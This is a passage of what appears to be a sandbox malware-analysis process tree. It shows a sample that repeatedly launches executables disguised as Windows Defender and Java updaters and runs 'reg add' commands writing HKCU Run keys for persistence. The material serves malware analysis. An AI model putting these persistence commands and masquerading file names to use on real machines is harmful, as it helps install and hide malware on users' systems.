        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        126⤵
        
        PID:2188
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        125⤵
        
        PID:3040
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        125⤵
        
        PID:3172
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C265.tmp\C266.tmp\C267.bat C:\Windows\system32\java.exe"
        126⤵
        
        PID:3980
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        127⤵
        
        PID:3632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        127⤵
        
        PID:2232
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        127⤵
        
        PID:1444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        127⤵
        Adds Run key to start application
        
        PID:952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        127⤵
        Adds Run key to start application
        
        PID:3856
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        127⤵
        
        PID:3260
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        128⤵
        
        PID:3624
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        127⤵
        
        PID:3524
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        127⤵
        
        PID:2052
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C66B.tmp\C66C.tmp\C66D.bat C:\Windows\system32\java.exe"
        128⤵
        
        PID:2408
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        129⤵
        Delays execution with timeout.exe
        
        PID:916
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        129⤵
        
        PID:2044
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        129⤵
        
        PID:4084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        129⤵
        Adds Run key to start application
        
        PID:3148
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        129⤵
        
        PID:3904
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        129⤵
        
        PID:3432
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        130⤵
        
        PID:4176
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        129⤵
        
        PID:1196
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        129⤵
        
        PID:3752
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C9E4.tmp\C9E5.tmp\C9E6.bat C:\Windows\system32\java.exe"
        130⤵
        
        PID:4200
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        131⤵
        
        PID:4236
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        131⤵
        Adds Run key to start application
        
        PID:4304
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        131⤵
        
        PID:4312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        131⤵
        
        PID:4324
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        131⤵
        
        PID:4332
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        131⤵
        
        PID:4344
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        132⤵
        
        PID:4632
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        131⤵
        
        PID:4352
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        131⤵
        
        PID:4360
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CE47.tmp\CE48.tmp\CE49.bat C:\Windows\system32\java.exe"
        132⤵
        Drops file in System32 directory
        
        PID:4672
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        133⤵
        Delays execution with timeout.exe
        
        PID:4724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        133⤵
        
        PID:4876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        133⤵
        
        PID:4884
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        133⤵
        
        PID:4892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        133⤵
        
        PID:4900
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        133⤵
        
        PID:4908
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        134⤵
        
        PID:3908
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        133⤵
        
        PID:4916
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        133⤵
        
        PID:4924
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D1A1.tmp\D1A2.tmp\D1A3.bat C:\Windows\system32\java.exe"
        134⤵
        Drops file in System32 directory
        
        PID:3544
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        135⤵
        Delays execution with timeout.exe
        
        PID:2000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        135⤵
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        135⤵
        
        PID:848
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        135⤵
        
        PID:2660
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        135⤵
        
        PID:4300
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        135⤵
        
        PID:4304
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        136⤵
        
        PID:4692
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        135⤵
        
        PID:4312
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        135⤵
        
        PID:4324
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D5C6.tmp\D5C7.tmp\D5C8.bat C:\Windows\system32\java.exe"
        136⤵
        Drops file in System32 directory
        
        PID:4600
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        137⤵
        
        PID:4352
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        137⤵
        Adds Run key to start application
        
        PID:2308
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        137⤵
        
        PID:2688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        137⤵
        
        PID:3880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        137⤵
        
        PID:4896
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        137⤵
        
        PID:4904
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        138⤵
        
        PID:2296
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        137⤵
        
        PID:4956
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        137⤵
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D9AC.tmp\D9AD.tmp\D9AE.bat C:\Windows\system32\java.exe"
        138⤵
        
        PID:4136
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        139⤵
        
        PID:3148
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        139⤵
        
        PID:3920
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        139⤵
        
        PID:848
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        139⤵
        
        PID:3064
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        139⤵
        
        PID:1512
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        139⤵
        
        PID:2660
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        140⤵
        
        PID:4768
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        139⤵
        
        PID:3284
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        139⤵
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD54.tmp\DD55.tmp\DD56.bat C:\Windows\system32\java.exe"
        140⤵
        Drops file in System32 directory
        
        PID:4444
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        141⤵
        
        PID:4552
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        141⤵
        
        PID:4704
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        141⤵
        
        PID:4824
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        141⤵
        Adds Run key to start application
        
        PID:4804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        141⤵
        
        PID:4424
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        141⤵
        
        PID:4696
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        142⤵
        
        PID:5100
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        141⤵
        
        PID:4872
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        141⤵
        
        PID:2192
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E16A.tmp\E16B.tmp\E16C.bat C:\Windows\system32\java.exe"
        142⤵
        
        PID:3452
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        143⤵
        
        PID:4980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        143⤵
        Adds Run key to start application
        
        PID:2284
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        143⤵
        
        PID:2276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        143⤵
        Adds Run key to start application
        
        PID:4988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        143⤵
        
        PID:3856
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        143⤵
        
        PID:3704
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        144⤵
        
        PID:4440
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        143⤵
        
        PID:3904
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        143⤵
        
        PID:4116
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E56F.tmp\E570.tmp\E571.bat C:\Windows\system32\java.exe"
        144⤵
        
        PID:4504
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        145⤵
        Delays execution with timeout.exe
        
        PID:4500
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        145⤵
        
        PID:4560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        145⤵
        
        PID:4588
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        145⤵
        Adds Run key to start application
        
        PID:4576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        145⤵
        
        PID:4592
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        145⤵
        
        PID:932
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        146⤵
        
        PID:4892
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        145⤵
        
        PID:2576
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        145⤵
        
        PID:4436
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E956.tmp\E957.tmp\E958.bat C:\Windows\system32\java.exe"
        146⤵
        
        PID:3288
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        147⤵
        
        PID:5060
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        147⤵
        Adds Run key to start application
        
        PID:3500
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        147⤵
        
        PID:4956
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        147⤵
        
        PID:2900
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        147⤵
        
        PID:3096
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        147⤵
        
        PID:4616
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        148⤵
        
        PID:4708
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        147⤵
        
        PID:1980
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        147⤵
        
        PID:3844
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED6B.tmp\ED6C.tmp\ED6D.bat C:\Windows\system32\java.exe"
        148⤵
        Drops file in System32 directory
        
        PID:3440
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        149⤵
        Delays execution with timeout.exe
        
        PID:4664
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        149⤵
        
        PID:4836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        149⤵
        
        PID:4800
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        149⤵
        
        PID:3144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        149⤵
        
        PID:3124
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        149⤵
        
        PID:4556
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        150⤵
        
        PID:4672
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        149⤵
        
        PID:4212
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        149⤵
        
        PID:4204
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F0E4.tmp\F0E5.tmp\F0E6.bat C:\Windows\system32\java.exe"
        150⤵
        
        PID:4732
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        151⤵
        
        PID:5108
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        151⤵
        
        PID:4980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        151⤵
        Adds Run key to start application
        
        PID:2232
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        151⤵
        Adds Run key to start application
        
        PID:4952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        151⤵
        
        PID:4252
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        151⤵
        
        PID:5040
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        152⤵
        
        PID:1572
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        151⤵
        
        PID:3668
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        151⤵
        
        PID:5060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F4CA.tmp\F4CB.tmp\F4CC.bat C:\Windows\system32\java.exe"
        152⤵
        
        PID:3644
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        153⤵
        
        PID:3188
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        153⤵
        
        PID:3228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        153⤵
        
        PID:4884
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        153⤵
        Adds Run key to start application
        
        PID:3980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        153⤵
        
        PID:5064
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        153⤵
        
        PID:5016
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        154⤵
        
        PID:4952
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        153⤵
        
        PID:4144
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        153⤵
        
        PID:5056
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F94D.tmp\F94E.tmp\F94F.bat C:\Windows\system32\java.exe"
        154⤵
        Drops file in System32 directory
        
        PID:4596
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        155⤵
        
        PID:4120
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        155⤵
        
        PID:3096
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        155⤵
        
        PID:4260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        155⤵
        
        PID:3104
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        155⤵
        
        PID:3636
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        155⤵
        
        PID:2992
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        156⤵
        
        PID:2348
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        155⤵
        
        PID:4164
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        155⤵
        
        PID:3784
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FCB6.tmp\FCB7.tmp\FCB8.bat C:\Windows\system32\java.exe"
        156⤵
        
        PID:4584
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        157⤵
        
        PID:4640
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        157⤵
        
        PID:4280
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        157⤵
        
        PID:3452
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        157⤵
        Adds Run key to start application
        
        PID:2192
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        157⤵
        
        PID:3328
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        157⤵
        
        PID:4968
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
